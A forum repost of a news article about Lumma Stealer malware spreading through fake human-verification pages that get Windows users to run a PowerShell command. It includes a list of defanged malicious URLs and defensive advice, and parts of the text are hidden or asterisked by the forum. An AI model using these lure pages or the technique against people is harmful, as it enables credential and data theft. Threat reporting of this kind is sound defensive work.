Jump to content
  • Sign Up
×
×
  • Create New...

Lumma Stealer Malware Being Spread to Windows Devices via Fake Human Verification Pages, CloudSEK Says

Pelican Press

By Pelican Press,
in World News

 Share

Recommended Posts

  • Diamond Member
Pelican Press Warlord

Pelican Press 0

Posted
  • Diamond Member
Posted

This is the hidden content, please

Lumma Stealer Malware Being Spread to Windows Devices via Fake Human Verification Pages, CloudSEK Says

Lumma Stealer, a recently identified information-stealing malware, is being distributed to users via fake human verification pages. According to researchers at the cybersecurity firm CloudSEK, the malware is targeting Windows devices and is designed to steal sensitive information from the infected device. Concerningly, researchers have discovered multiple phishing websites which are deploying these fake verification pages to trick users into downloading the malware. CloudSEK researchers have warned organisations to implement endpoint protection solutions and to train employees and users about this new social engineering tactic.

Lumma Stealer Malware Being Distributed Using New Phishing Technique

According to the CloudSEK

This is the hidden content, please
, multiple active websites were found to be spreading the Lumma Stealer malware. The technique was first
This is the hidden content, please
by Unit42 at Palo Alto Networks, a cybersecurity firm, but the scope of the distribution chain is now believed to be much larger than previously assumed.

The attackers have set up various malicious websites and have added a fake human verification system, resembling the

This is the hidden content, please
Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA) page. However, unlike the regular CAPTCHA page where users have to check a few boxes or perform similar pattern-based tasks to prove they are not a ****, the fake pages instruct the user to run some unusual commands.

In one instance, the researchers spotted a fake verification page asking users to ******** a PowerShell script. PowerShell scripts contain a series of commands that can be ********* in the Run dialog box. In this case, the commands were found to fetch the content from the a.txt file hosted on a remote server. This prompted a file to be downloaded and extracted on the Windows system, infecting it with Lumma Stealer.

The report also listed the malicious URLs which were spotted distributing the malware to unsuspecting users. However, this is not the full list and there might be more such websites carrying out the *******.

  • hxxps[://]heroic-genie-2b372e[.]netlify[.]app/please-verify-z[.]html
  • hxxps[://]fipydslaongos[.]b-cdn[.]net/please-verify-z[.]html
  • hxxps[://]sdkjhfdskjnck[.]s3[.]amazonaws[.]com/human-verify-system[.]html
  • hxxps[://]verifyhuman476[.]b-cdn[.]net/human-verify-system[.]html
  • hxxps[://]pub-9c4ec7f3f95c448b85e464d2b533aac1[.]r2[.]dev/human-verify-system[.]html
  • hxxps[://]verifyhuman476[.]b-cdn[.]net/human-verify-system[.]html
  • hxxps[://]newvideozones[.]click/veri[.]html
  • hxxps[://]ch3[.]dlvideosfre[.]click/human-verify-system[.]html
  • hxxps[://]newvideozones[.]click/veri[.]html
  • hxxps[://]ofsetvideofre[.]click

The researchers also observed that content delivery networks (CDNs) were being used to spread these fake verification pages. Further, the attackers were spotted using base64 encoding and clipboard manipulation to evade demonstration. It is also possible to distribute other malware using the same technique, although such instances have not been seen so far.

Since the modus operandi of the ******* is based on phishing techniques, no security patch can prevent devices from getting infected. However, there are some steps users and organisations can take to safeguard against the Lumma stealer malware.

As per the report, users and employees should be made aware of this phishing tactic to help them not fall for it. Additionally, organisations should implement and maintain reliable endpoint protection solutions to detect and block PowerShell-based attacks. Further, regularly updating and patching systems to reduce the vulnerabilities that Lumma Stealer malware can exploit should also help.

For the latest tech news and reviews, follow Gadgets 360 on

This is the hidden content, please
,
This is the hidden content, please
,
This is the hidden content, please
,
This is the hidden content, please
and
This is the hidden content, please
. For the latest videos on gadgets and tech, subscribe to our
This is the hidden content, please
. If you want to know everything about top influencers, follow our in-house
This is the hidden content, please
on
This is the hidden content, please
and
This is the hidden content, please
.

data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///ywAAAAAAQABAAACAUwAOw==

Moto G85 5G Could Soon Be Available in Two New Colour Options in India




This is the hidden content, please

#Lumma #Stealer #Malware #Spread #Windows #Devices #Fake #Human #Verification #Pages #CloudSEK

This is the hidden content, please

This is the hidden content, please

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing

  • Vote for the server

    To vote for this server you must login.

    Jim Carrey Flirting GIF

  • Recently Browsing   0 members

    • No registered users viewing this page.

Important Information

Privacy Notice: We utilize cookies to optimize your browsing experience and analyze website traffic. By consenting, you acknowledge and agree to our Cookie Policy, ensuring your privacy preferences are respected.

  I accept